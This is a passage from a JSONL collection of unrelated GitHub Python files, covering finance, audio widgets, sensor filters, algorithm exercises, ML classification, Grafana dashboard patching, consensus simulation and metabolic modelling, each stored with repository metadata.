0.075, 0.1, 0.125, 0.15, 0.2]\n npvs = cfs_sens.npv_sensitivity(short_rates)\n print(npvs)\n plt.plot(short_rates, npvs, 'b')\n plt.plot(short_rates, npvs, 'ro')\n plt.plot((0, max(short_rates)), (0, 0), 'r', lw=2)\n plt.grid(True)\n plt.xlabel('short rate')\n plt.ylabel('net present value')\n plt.savefig(PATH + 'cash_flow.png', dpi=300)\n plt.close()\n\nclass short_rate_g(trapi.HasTraits):\n name = trapi.Str\n rate = trapi.Float\n time_list = trapi.Array(dtype=np.float, shape=(1,5))\n disc_list = trapi.Array(dtype=np.float, shape=(1,5))\n update = trapi.Button\n \n def _update_fired(self):\n self.disc_list = np.exp(-self.rate * self.time_list)\n v = trui.View(trui.Group(trui.Item(name='name'),\n trui.Item(name='rate'),\n trui.Item(name='time_list', label = 'Insert Time List Here'),\n trui.Item(name='update', show_label=False),\n trui.Item(name='disc_list', label='Press Update for Factors'),\n show_border=True, label='Calculate Discount Factors'),\n buttons = [trui.OKButton, trui.CancelButton],\n resizable = True)\n \n def get_discount_factors(self):\n return np.exp(-self.rate * self.time_list)\n \nclass cash_flow_series_g(trapi.HasTraits):\n name = trapi.Str\n short_rate = trapi.Range(0.0, 0.5, 0.05)\n time_list = trapi.Array(dtype=np.float, shape=(1,6))\n present_values = trapi.Array(dtype=np.float, shape=(1,6))\n cash_flows = trapi.Array(dtype=np.float, shape=(1,6))\n disc_values = trapi.Array(dtype=np.float, shape=(1,6))\n net_present_value = trapi.Float\n update = trapi.Button\n \n def _update_fired(self):\n self.disc_values = np.exp(-self.rate * self.time_list)\n self.present_values = self.disc_values * self.cash_flows\n self.net_present_value = np.sum(self.present_values)\n v = trui.View(trui.Group(trui.Item(name='name'),\n trui.Item(name='short_rate'),\n trui.Item(name='time_list', label = 'Time List'),\n trui.Item(name='cash_flows', label = 'Cash Flows'),\n trui.Item(name='update', show_label=False),\n trui.Item(name='disc_values', label='Discount Factors'),\n trui.Item(name='present_values', label='Present Values'),\n trui.Item(name='net_present_value', label='Net Present Value'),\n show_border=True, label='Calculate Present Values'),\n buttons = [trui.OKButton, trui.CancelButton],\n resizable = True)\n \n def get_discount_factors(self):\n return np.exp(-self.rate * self.time_list)\n \n\ndef short_rate_gui():\n sr = short_rate_g()\n sr.configure_traits()\n sr.name = 'sr_class'\n sr.rate = 0.05\n sr.time_list = [0.0, 0.5, 1.0, 1.5, 2.0]\n print(sr.rate)\n print(sr.time_list)\n print(sr.get_discount_factors())\n sr._update_fired()\n\n\nif __name__ == \"__main__\":\n # object_orientation()\n short_rate_class()\n # Not compatible for Python3\n # short_rate_gui()","repo_name":"mccarvik/python_for_finance","sub_path":"books/python_for_finance_book/ch_scraps/13ch_scrap.py","file_name":"13ch_scrap.py","file_ext":"py","file_size_in_byte":9938,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"10376342823","text":"from gi.repository import Gtk, Gdk, Keybinder\nimport os\nimport dbus\nimport util\n\n__all__ = [\"Volume\"]\n\nPROPS = \"org.freedesktop.DBus.Properties\"\n\nimport ctypes\nDLL = ctypes.CDLL(\"libpulse.so.0\")\nvolume_to_db = DLL.pa_sw_volume_to_dB\nvolume_to_db.argtypes = (ctypes.c_uint32,)\nvolume_to_db.restype = ctypes.c_double\nvolume_from_db = DLL.pa_sw_volume_from_dB\nvolume_from_db.argtypes = (ctypes.c_double,)\nvolume_from_db.restype = ctypes.c_uint32\n\nVOLUME_NORM = volume_from_db(0)\nVOLUME_UI_MAX = 
volume_from_db(11)\n\nLABEL_FORMAT = \"{:+.1f} dB\"\n\ndef pulse_bus_address():\n\tif 'PULSE_DBUS_SERVER' in os.environ:\n\t\taddress = os.environ['PULSE_DBUS_SERVER']\n\telse:\n\t\tbus = dbus.SessionBus()\n\t\tserver_lookup = bus.get_object(\"org.PulseAudio1\", \"/org/pulseaudio/server_lookup1\")\n\t\taddress = server_lookup.Get(\"org.PulseAudio.ServerLookup1\", \"Address\", dbus_interface=PROPS)\n\treturn address\n\nclass Volume(Gtk.EventBox):\n\tdef __init__(self, keys=False, spacing=3):\n\t\tsuper().__init__()\n\n\t\tself.icon = Gtk.Label()\n\t\tself.text = Gtk.Label()\n\t\tbox = Gtk.Box(spacing=spacing)\n\t\tbox.pack_start(self.icon, False, False, 0)\n\t\tbox.pack_start(self.text, False, False, 0)\n\t\tself.add(box)\n\n\t\tself.icon.show()\n\t\tself.text.show()\n\t\tbox.show()\n\t\tself.show()\n\n\t\tself.build_popup()\n\n\t\tself.set_events(Gdk.EventMask.BUTTON_PRESS_MASK)\n\t\tself.connect(\"button-press-event\", self.click)\n\n\t\tself.pulse_bus = dbus.connection.Connection(pulse_bus_address())\n\t\tself.pulse_core = self.pulse_bus.get_object(None, \"/org/pulseaudio/core1\")\n\n\t\tself.pulse_core.ListenForSignal(\"org.PulseAudio.Core1.FallbackSinkUpdated\", [self.pulse_core], dbus_interface=\"org.PulseAudio.Core1\")\n\t\tself.pulse_core.ListenForSignal(\"org.PulseAudio.Core1.FallbackSinkUnset\", [self.pulse_core], dbus_interface=\"org.PulseAudio.Core1\")\n\n\t\tself.default_sink = None\n\t\tself.updateSink(self.pulse_core.Get(\"org.PulseAudio.Core1\", \"FallbackSink\", dbus_interface=PROPS))\n\n\t\tself.pulse_bus.add_signal_receiver(self.updateSink, \"FallbackSinkUpdated\")\n\t\tself.pulse_bus.add_signal_receiver(self.unsetSink, \"FallbackSinkUnset\")\n\t\tself.pulse_bus.add_signal_receiver(self.updateVolume, \"VolumeUpdated\")\n\t\tself.pulse_bus.add_signal_receiver(self.updateMute, \"MuteUpdated\")\n\n\t\tif keys:\n\t\t\tKeybinder.bind(\"AudioMute\", self.toggleMute)\n\t\t\tKeybinder.bind(\"AudioRaiseVolume\", self.changeVolume, +5)\n\t\t\tKeybinder.bind(\"AudioLowerVolume\", self.changeVolume, -5)\n\n\tdef build_popup(self):\n\t\tself.label = Gtk.Label()\n\t\tself.slider = Gtk.Scale()\n\t\tself.slider.set_draw_value(False)\n\t\tself.slider.set_range(0, VOLUME_UI_MAX)\n\t\tself.slider.set_increments(VOLUME_NORM/100, VOLUME_NORM/20)\n\t\tself.slider.add_mark(VOLUME_NORM, Gtk.PositionType.RIGHT, \"\")\n\t\tself.slider.connect(\"change-value\", self.changeSlider)\n\t\tself.button = Gtk.ToolButton()\n\t\tself.button.set_halign(Gtk.Align.CENTER)\n\t\tself.button.connect(\"clicked\", self.toggleMute)\n\n\t\tself.slider.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.slider.set_inverted(True)\n\t\tself.slider.set_size_request(0, 150)\n\t\tbox = Gtk.Box()\n\t\tbox.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tbox.pack_start(self.label, False, False, 0)\n\t\tbox.pack_start(self.slider, True, True, 0)\n\t\tbox.pack_start(self.button, False, False, 0)\n\t\tself.popup = util.make_popup(util.framed(box), self)\n\n\tdef unsetSink(self):\n\t\tif self.default_sink:\n\t\t\tself.pulse_core.StopListeningForSignal(\"org.PulseAudio.Core1.Device.VolumeUpdated\", dbus_interface=\"org.PulseAudio.Core1\")\n\t\t\tself.pulse_core.StopListeningForSignal(\"org.PulseAudio.Core1.Device.MuteUpdated\", dbus_interface=\"org.PulseAudio.Core1\")\n\n\tdef updateSink(self, sink):\n\t\tself.unsetSink()\n\t\tself.default_sink = self.pulse_bus.get_object(None, sink)\n\t\tself.pulse_core.ListenForSignal(\"org.PulseAudio.Core1.Device.VolumeUpdated\", [self.default_sink], 
dbus_interface=\"org.PulseAudio.Core1\")\n\t\tself.pulse_core.ListenForSignal(\"org.PulseAudio.Core1.Device.MuteUpdated\", [self.default_sink], dbus_interface=\"org.PulseAudio.Core1\")\n\t\tself.updateVolume(self.default_sink.Get(\"org.PulseAudio.Core1.Device\", \"Volume\", dbus_interface=PROPS))\n\t\tself.updateMute(self.default_sink.Get(\"org.PulseAudio.Core1.Device\", \"Mute\", dbus_interface=PROPS))\n\n\tdef updateVolume(self, vol):\n\t\tself.text.set_text(\"{:.0f}%\".format(100 * max(vol) / VOLUME_NORM))\n\t\tself.icon.set_text(\"♪\")\n\t\tself.slider.set_value(max(vol))\n\t\tself._updatePopup()\n\n\tdef updateMute(self, mute):\n\t\tself.set_opacity(0.5 if mute else 1)\n\t\tself.button.set_icon_name(\"audio-volume-muted\" if mute else \"audio-volume-high\")\n\n\tdef click(self, _, evt):\n\t\tif (evt.button, evt.type) == (1, Gdk.EventType.BUTTON_PRESS):\n\t\t\tif self.popup.is_visible():\n\t\t\t\tself.popup.hide()\n\t\t\telse:\n\t\t\t\tself.popup.show_all()\n\n\tdef _updatePopup(self):\n\t\tself.label.set_markup(LABEL_FORMAT.format(volume_to_db(int(self.slider.get_value()))))\n\n\tdef changeSlider(self, w, mode, val):\n\t\ta = w.get_adjustment()\n\t\tif val < a.get_lower(): val = a.get_lower()\n\t\tif val > a.get_upper(): val = a.get_upper()\n\t\tval = round(val / VOLUME_NORM * 100) * VOLUME_NORM / 100\n\t\tself.default_sink.Set(\"org.PulseAudio.Core1.Device\", \"Volume\", dbus.Array([int(val)], \"u\"), dbus_interface=PROPS)\n\n\tdef toggleMute(self, _):\n\t\tself.default_sink.Set(\"org.PulseAudio.Core1.Device\", \"Mute\", not self.default_sink.Get(\"org.PulseAudio.Core1.Device\", \"Mute\", dbus_interface=PROPS), dbus_interface=PROPS)\n\n\tdef changeVolume(self, _, d):\n\t\tval = max(self.default_sink.Get(\"org.PulseAudio.Core1.Device\", \"Volume\", dbus_interface=PROPS))\n\t\tval = round(val / VOLUME_NORM * 100 + d) * VOLUME_NORM / 100\n\t\tif val < 0: val = 0\n\t\tself.default_sink.Set(\"org.PulseAudio.Core1.Device\", \"Volume\", dbus.Array([int(val)], \"u\"), dbus_interface=PROPS)\n","repo_name":"Kyuuhachi/Icebar-legacy","sub_path":"widgets/volume_pulse.py","file_name":"volume_pulse.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34696600546","text":"\"\"\"Find what initial beta values require the largest fix\"\"\"\n# %%\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\n\nimport numpy as np\nimport scipy.optimize\n\nimport madfilters.py as py\nimport madfilters.cpp as cpp\nimport madfilters.utils.io as io\nimport madfilters.utils.orientation as ot\n\n\n# Load imu data\nacc, gyr, mag, times, q0, freq = io.load_sample_data()\n\n# Through the ahrs module's madgwick, this gives us a \"source of truth\" to compare to\nahrs_filter = py.AhrsMadgwick(beta=0.1, freq=freq, q0=q0)\nahrs_Q = ahrs_filter.update(acc, gyr, mag)\n\n#Cut down data for less calculations\nmask = (times > 6) & (times<15)\nacc=acc[mask]\ngyr=gyr[mask]\nmag=mag[mask]\ntimes=times[mask]\nQ_comp=ahrs_Q[mask]\nq0 = Q_comp[0]\n\n\ndef find_optimum_beta(beta_base, base_filter, free_filter):\n \"\"\"Evaluates the best beta to use on the free filter, given the base filter's beta\"\"\"\n\n Q_base = base_filter.update(acc=acc, gyr=gyr, mag=mag, q=q0, beta=beta_base)\n \n \n def quat_diff(beta, Q_base, free_filter):\n \"\"\"Calculate quaternions and average difference\"\"\"\n Q_free = free_filter.update(acc, gyr, mag, beta=beta, q=q0)\n diff = ot.q_angle_diff_safe(Q_base, Q_free)\n return 
np.average(diff)\n\n\n result = scipy.optimize.minimize(fun=quat_diff, args=(Q_base, free_filter), \n x0 = beta_base, method='Nelder-Mead', options=dict(maxiter=100))\n\n beta_optimum = result.x[0]\n\n return beta_optimum\n\ndef find_optimum_betas(base_filter, free_filter):\n betas = np.linspace(0.001,1,10)\n vbeta_diff = np.vectorize(find_optimum_beta)\n y_values = vbeta_diff(betas, base_filter, free_filter)\n\n return betas, y_values\n\nmad_filter = cpp.MadgwickOriginalSqrt(freq=freq)\n\nbetas, y_values = find_optimum_betas(base_filter=ahrs_filter, free_filter=mad_filter)\n\nfig = plt.figure(figsize=(14, 9), facecolor=\"w\")\n\nfig.suptitle('Beta Conversions', fontsize=16)\n\nax0 = fig.add_subplot(211)\nax0.plot(betas, y_values/betas, label='Py AHRS vs original C')\nax0.set(xlabel='Py Ahrs beta', ylabel='beta ratio: C / Py Ahrs', title=\"Ratio of beta values\")\nax0.grid()\nax0.legend()\n\n\nfixed_filter = cpp.MadgwickFixed(freq=freq)\n\nsqrt_betas, fixed_betas = find_optimum_betas(base_filter=mad_filter, free_filter=fixed_filter)\n\nax1 = fig.add_subplot(212)\nax1.plot(sqrt_betas, fixed_betas, label='Fixed C')\nax1.set(xlabel='Sqrt C beta', ylabel='Fixed C beta', title=\"Bug -> Fix conversion\")\nax1.grid()\n\nplt.subplots_adjust(hspace=0.3)\n\nplt.savefig(f\"./exp7_beta_conversions.png\", transparent=False)\nplt.show()\n","repo_name":"RideBeeline/madgwick-investigation","sub_path":"experiment_7_beta_fix/beta_conversions.py","file_name":"beta_conversions.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"73953935209","text":"\n\n\ndef minCostClimbingStairs(cost):\n if not cost:\n return 0\n\n current = next = 0\n for i in reversed(range(len(cost))):\n current, next = next, min(next, current) + cost[i]\n return min(current, next)\n \n # dp = [0] * len(cost)\n\n # dp[0] = cost[0]\n\n # if len(cost) > 1:\n # dp[1] = cost[1]\n\n # for i in range(2, len(cost)):\n # dp[i] = cost[i] + min(dp[i-2], dp[i-1])\n\n # return min(dp[-2], dp[-1])\n\n\nprint(minCostClimbingStairs([10, 15, 20]))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/easy/minCostClimbingStairs.py","file_name":"minCostClimbingStairs.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2238172848","text":"#!/usr/bin/env python3\nfrom glob import glob\nimport os.path\nimport sys\n\nsys.path[0:0] = [\"../..\"]\n\nfailed = False\ntry:\n from osaca.semantics.hw_model import MachineModel\nexcept ModuleNotFoundError:\n print(\n \"Unable to import MachineModel, probably some dependency is not yet installed. SKIPPING. 
\"\n \"First run of OSACA may take a while to build caches, subsequent runs will be as fast as \"\n \"ever.\"\n )\n sys.exit()\n\nprint(\"Building cache: \", end=\"\")\nsys.stdout.flush()\n\n# Iterating architectures\nfor f in glob(os.path.join(os.path.dirname(__file__), \"*.yml\")):\n MachineModel(path_to_yaml=f)\n print(\".\", end=\"\")\n sys.stdout.flush()\n\n# Iterating ISAs\nfor f in glob(os.path.join(os.path.dirname(__file__), \"isa/*.yml\")):\n MachineModel(path_to_yaml=f)\n print(\"+\", end=\"\")\n sys.stdout.flush()\n\nprint()\n","repo_name":"RRZE-HPC/OSACA","sub_path":"osaca/data/_build_cache.py","file_name":"_build_cache.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"53"} +{"seq_id":"24498880381","text":"\"\"\"\nmdahole2\nA Python interface for the HOLE suite tools to analyze an ion channel pore or transporter pathway as a function of time or arbitrary order parameters.\n\"\"\"\n\n# Handle versioneer\nfrom ._version import get_versions\nversions = get_versions()\n__version__ = versions['version']\n__git_revision__ = versions['full-revisionid']\ndel get_versions, versions\n","repo_name":"MDAnalysis/hole2-mdakit","sub_path":"mdahole2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"9888002807","text":"# Utility script for managing compute log stdout mirroring\n#\n# This script is run as a subprocess during step computation to babysit a tail child process which\n# mirrors compute log output from a file to stdout. This utility script checks to see if its parent\n# process has died and kills the tail child process if so. This is to ensure that execution that\n# suddenly exits mid-computation without cleaning up after itself will not orphan long-lived tail\n# processes.\n\nimport os\nimport signal\nimport sys\nimport time\n\n\ndef watch(args):\n if not args or len(args) != 2:\n return\n\n parent_pid = int(args[0])\n tail_pid = int(args[1])\n\n if not parent_pid or not tail_pid:\n return\n\n while True:\n # check if this process has been orphaned, in which case kill the tail_pid\n\n # we assume that the process is orphaned if parent pid changes. 
because systemd\n # user instances also adopt processes, os.getppid() == 1 is no longer a reliable signal\n # for being orphaned.\n if os.getppid() != parent_pid:\n try:\n os.kill(tail_pid, signal.SIGTERM)\n except OSError:\n pass\n break\n else:\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n watch(sys.argv[1:])\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/execution/watch_orphans.py","file_name":"watch_orphans.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"33162714128","text":"class Tribonachi():\n cout = 1\n num1 = 0\n num2 = 0\n num3 = 0\n\n def __init__(self, num1, num2, num3):\n self.num1 = num1\n self.num2 = num2\n self.num3 = num3\n\n def iterationMethod(self, limit):\n for count in range(limit):\n result = self.num1 + self.num2 + self.num3\n print(self.num3)\n self.num1 = self.num2\n self.num2 = self.num3\n self.num3 = result\n\nlimit = int(input(\"Enter limit for digits of Tribonachi: \"))\n\ntribonachi = Tribonachi(1, 1, 1)\nprint(1)\nprint(1)\ntribonachi.iterationMethod(limit)\n","repo_name":"bembel1993/greatPython","sub_path":"- LAB_5_magic_method/Lab_5.py","file_name":"Lab_5.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30091011194","text":"import collections\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import normalize\nfrom sklearn.model_selection import train_test_split\nfrom svm_model import SVM\nfrom kernels import rbf_kernel, poly_kernel\n\n\ndef test_svm(X_train, Y_train, X_test, Y_test, sigma, degree, kernel, C):\n kernel_parameter = sigma\n if kernel.__name__ == 'poly_kernel':\n kernel_parameter = degree\n svm_model = SVM(X_train, Y_train, kernel_parameter, kernel, C)\n alphas = svm_model.fit()\n b = svm_model.b(alphas)\n dec = []\n good_pred = 0\n Y_test_arr = np.array(Y_test)\n for i in range(len(X_test)):\n dec.append(svm_model.decision(alphas, X_test[i], b))\n if dec[i] == Y_test_arr[i]:\n good_pred += 1\n print(f'good predictions {good_pred}/{len(X_test)} -> {(good_pred / len(X_test)) * 100}%')\n good_wines = 0\n for i in dec:\n if i == 1:\n good_wines += 1\n occur = collections.Counter(Y_test_arr)\n print(f'number of good wines {good_wines}/{len(dec)} there is {occur[1]} good wines')\n print(f'number of bad {len(dec) - good_wines}/{len(dec)} there is {occur[-1]} bad wines')\n\ndef main():\n df = pd.read_csv('winequality-red.csv', header=0, sep=';')\n condition = df['quality'] > 5\n df['quality'] = np.where(condition, 1, -1)\n X = df.drop('quality', axis=1).copy()\n Y = df['quality'].copy()\n X = normalize(X, axis=0)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, train_size=0.8, test_size=0.2, shuffle=False, random_state=42)\n sigma = 0.1\n degree = 100\n C = 1\n test_svm(X_train, Y_train, X_test, Y_test, sigma, degree, poly_kernel, C)\n\n\nif __name__ == '__main__':\n SystemExit(main())\n","repo_name":"maciejgrosz/AI-wsi","sub_path":"svm-classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1167388653","text":"\"\"\"\nGiven two Python sets, write a Python program to update the first set with items that exist only in the first set and not in the second set\n\nHints: Search about difference_update() function in set\n\nGiven 
Sets\nset1 = {10, 20, 30}\nset2 = {20, 40, 50}\n\nExpected Output:\n{10, 30}\n\n\"\"\"\n\nset1 = {10, 20, 30}\nset2 = {20, 40, 50}\n\nfor item in set2 :\n    for item2 in set1.copy() :\n        if item == item2 :\n            set1.remove(item)\n\nprint(set1)\n\n\n","repo_name":"Saad-001/learning-python-with-problem-solving","sub_path":"week_2/practice_modules/practice_module_1/prob_10.py","file_name":"prob_10.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28236920626","text":"from PyQt5.QtCore import QThread, pyqtSignal\n\n\nclass ExportThread(QThread):\n    finishSignal = pyqtSignal()\n\n    def __init__(self, func, args):\n        super(ExportThread, self).__init__()\n        self.func = func\n        self.args = args\n\n    def run(self):\n        self.func(*self.args)\n        self.finishSignal.emit()\n\n\nclass backUpThread(QThread):\n    finishSignal = pyqtSignal(tuple)\n\n    def __init__(self, func, args):\n        super(backUpThread, self).__init__()\n        self.func = func\n        self.args = args\n        self.ret = None\n\n    def run(self):\n        self.ret = self.func(*self.args)\n        self.finishSignal.emit(self.ret)\n","repo_name":"zhj12138/MdLibrary","sub_path":"mythreads.py","file_name":"mythreads.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20987956978","text":"opcion = int(input(\"Do you want to enter data? 1- Yes, 0- No \"))\nprint()\nwhile opcion == 1:\n    aire = int(input(\"From 1 to 10, what is the air quality: \"))\n    agua = int(input(\"From 1 to 10, what is the water quality: \"))\n    comida = int(input(\"From 1 to 10, what is the quality of the food you eat: \"))\n    suma = aire + agua + comida\n    if suma < 10:\n        print(\"Your health could be affected by your lifestyle\")\n    elif suma > 20:\n        print(\"You have a good quality of life\")\n    else:\n        print(\"Your quality of life is acceptable, but it could improve\")\n    print()\n    opcion = int(input(\"Do you want to enter data? 1- Yes, 0- No \"))\n","repo_name":"FerroSantiago/PythonFundamentos","sub_path":"estructuras.py","file_name":"estructuras.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9892306856","text":"import matplotlib\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as ss\nfrom matplotlib.animation import FuncAnimation\n\nfrom protocol import SnowballProtocol\n\n\ndef snowball(args):\n    proto = SnowballProtocol(args)\n\n    verbose = args.verbose_every is not None\n\n    if verbose:\n        print(\"Running snowball\")\n        print(proto.snowball_map)\n\n    done = False\n    while not done:\n        done = proto.step()\n\n        if verbose and proto.iteration % args.verbose_every == 0:\n            print(f\"Iteration: {proto.iteration}\")\n            print(f\"Remaining participants:\", len(proto.running_participants) - proto.adversaries_num)\n            print(\"Snowball map:\", proto.snowball_map)\n\n    if verbose:\n        print(\"Consensus:\", proto.consensus)\n        print(\"Snowball iterations:\", proto.iteration)\n        print(proto.snowball_map)\n\n    return proto\n\n\ndef snowball_plt(args):\n    proto = SnowballProtocol(args)\n\n    snowball_map = proto.snowball_map\n    fig = plt.figure()\n\n    col_dist = fig.add_subplot(221)\n    pnts = col_dist.scatter([0, 1], [snowball_map[True], snowball_map[False]], color=\"red blue\".split())\n    col_dist.set_xlim(-1, 2)\n    col_dist.set_ylim(0, proto.good_num)\n\n    corr_ax = fig.add_subplot(222)\n    corr_ax.set_title(\"Count confidence correlation\")\n\n    count_ax = fig.add_subplot(223)\n    count_ax.set_title(\"Participants count distribution\")\n    count_true_line, = count_ax.plot([], [], color=\"red\")\n    count_false_line, = count_ax.plot([], [], color=\"blue\")\n\n    confidence_ax = fig.add_subplot(224)\n    confidence_ax.set_title(\"Participants confidence distribution\")\n    confidence_true_line, = confidence_ax.plot([], [], color=\"red\")\n    confidence_false_line, = confidence_ax.plot([], [], color=\"blue\")\n\n    proto._removed = False\n\n    def update(frame):\n        for i in range(args.iterations_per_frame):\n            done = proto.step()\n            if done:\n                break\n\n        if args.remove_after is not None and not proto._removed:\n            min_confidence = min(x.confidence for x in proto.participant_objects if not x.adversary)\n\n            # Remove adversaries after all participants have confidence greater than some threshold\n            if min_confidence >= args.remove_after:\n                proto._removed = True\n                proto.remove_adversaries()\n\n        snowball_map = {False: 0, True: 0}\n        count_map = {False: [], True: []}\n        confidence_map = {False: [], True: []}\n\n        for part in proto.participant_objects:\n            # Only check the color of non-adversarial participants\n            if not part.adversary:\n                snowball_map[part.color] += 1\n                count_map[part.color].append(part.count)\n                confidence_map[part.color].append(part.confidence)\n\n        def kde_helper(data, x, line):\n            max_y = 0\n            try:\n                kde = ss.gaussian_kde(data)\n                y = kde(x)\n                max_y = max(y)\n                line.set_data(x, y)\n            # Exceptions to handle degenerate data\n            except np.linalg.linalg.LinAlgError:\n                pass\n            except ValueError:\n                pass\n            finally:\n                return max_y\n\n        # Count graphic update\n        max_count = max(count_map[True] + count_map[False])\n        xcount = np.linspace(0, max_count, 1000)\n        count_ax.set_xlim(0, max_count)\n        count_ax_ylim = 0\n\n        count_ax_ylim = max(count_ax_ylim, kde_helper(count_map[True], xcount, count_true_line))\n        count_ax_ylim = max(count_ax_ylim, kde_helper(count_map[False], xcount, count_false_line))\n\n        count_ax.set_ylim(0, count_ax_ylim)\n\n        # 
Confidence graphic update\n\n max_confidence = max(confidence_map[True] + confidence_map[False])\n xconfidence = np.linspace(0, max_confidence, 1000)\n confidence_ax.set_xlim(0, max_confidence)\n confidence_ax_ylim = 0\n confidence_ax_ylim = max(confidence_ax_ylim,\n kde_helper(confidence_map[True], xconfidence, confidence_true_line))\n confidence_ax_ylim = max(confidence_ax_ylim,\n kde_helper(confidence_map[False], xconfidence, confidence_false_line))\n\n confidence_ax.set_ylim(0, confidence_ax_ylim)\n\n pnts.set_offsets([[0, snowball_map[True]], [1, snowball_map[False]]])\n\n corr_ax.clear()\n corr_ax.set_title(\"Count confidence correlation\")\n corr_ax.scatter(count_map[True], confidence_map[True], color='red')\n corr_ax.scatter(count_map[False], confidence_map[False], color='blue')\n corr_ax.set_ylim(0, None)\n\n col_dist.set_title(\n f\"Iteration: {proto.iteration} Red: {snowball_map[True]} Blue: {snowball_map[False]}\"\n f\" {'OFF' if proto._removed else 'ON'}\")\n\n return pnts, count_true_line, count_false_line\n\n print(\"Snowball\")\n\n _ = FuncAnimation(fig, update, interval=1, repeat=False)\n plt.show()\n","repo_name":"SkidanovAlex/snowball","sub_path":"snowball/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"2998321115","text":"import os\nimport copy\nimport logging\nimport urllib.parse\n\nimport requests\n\nlog = logging.getLogger(__name__)\n\n\nclass Api:\n def __init__(self, base_uri, token):\n self.base_url = base_uri\n self.session = requests.Session()\n self.session.headers['Authorization'] = 'Bearer ' + token\n\n def get(self, uri):\n resp = self.session.get(urllib.parse.urljoin(self.base_url, uri))\n resp.raise_for_status()\n return resp.json()\n\n def post(self, uri, **kwargs):\n resp = self.session.post(urllib.parse.urljoin(self.base_url, uri), **kwargs)\n resp.raise_for_status()\n return resp.json()\n\n\napi = Api(urllib.parse.urljoin(os.environ['GRAFANA_URL'], 'api/'), os.environ['GRAFANA_TOKEN'])\n\n\ndef main():\n logging.basicConfig()\n search_results = api.get('search')\n for dashboard_meta in search_results:\n if dashboard_meta['type'] == 'dash-db':\n try:\n patch_dashboard(dashboard_meta)\n except Exception:\n log.exception('Failed to patch dashboard %s', dashboard_meta['title'])\n\n\ndef patch_dashboard(dashboard_meta):\n uid = dashboard_meta['uid']\n dashboard = api.get(f'dashboards/uid/{uid}')['dashboard']\n original_dashboard = copy.deepcopy(dashboard)\n\n add_common_annotations(dashboard)\n\n if dashboard != original_dashboard:\n data = {\n 'dashboard': dashboard,\n 'message': 'add common annotations',\n 'overwrite': False,\n }\n api.post('dashboards/db/', json=data)\n print(f'PATCHED {dashboard_meta[\"title\"]}')\n\n\ndef add_common_annotations(dashboard):\n \"\"\"\n Makes our global \"a\" annotation visible in all dashboard panels\n \"\"\"\n annotation_srcs = dashboard['annotations']['list']\n annotation_src = next(src for src in annotation_srcs if src['datasource'] == '-- Grafana --')\n annotation_src['type'] = 'tags'\n annotation_src['matchAny'] = True\n if 'tags' not in annotation_src:\n annotation_src['tags'] = []\n if 'a' not in annotation_src['tags']:\n annotation_src['tags'].append('a')\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"smpio/grafana-operator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35719376205","text":"import numpy as np\nimport pandas as pd\nimport cobra as cb\nfrom scipy.integrate import ode\nimport matplotlib.pyplot as plt\nimport json\nfrom datetime import date\nimport os\n\nsv = True\ntoday = date.today().strftime(\"%B%d%Y\")\n\n\n\ntry:\n direct = \"direct_meth/\" + today\n os.mkdir(direct)\nexcept:\n for i in range(100):\n direct = \"direct_meth/\" + today + \"_\" + str(i)\n try:\n os.mkdir(direct)\n break\n except:\n pass\n\n\n\n#xdot = x*growth rate\n#ydot = -x*flux\ndef dfba_RHS(t,y,params):\n model = params[0]\n exchg_order = params[1] #list of rxn ids in media file\n kappas = params[2]\n deathrate = params[3]\n inflow = params[4]\n x = y[0]\n yvec = y[1:]\n #reset the media file with kappa*y\n tmpmed = model.medium\n for i in range(len(yvec)):\n if exchg_order[i] in tmpmed.keys():\n tmpmed[exchg_order[i]] = kappas[i]*yvec[i]\n #optimize with cobra\n model.medium = tmpmed\n try:\n optm = model.optimize()\n xd = x*optm.objective_value - x*deathrate\n yd = list(np.array([x*optm.fluxes[exrn] if exrn in tmpmed.keys() else 0 for exrn in exchg_order]) + np.array(yvec)*np.array(inflow))\n dfba_RHS.optcount += 1\n except:\n xd 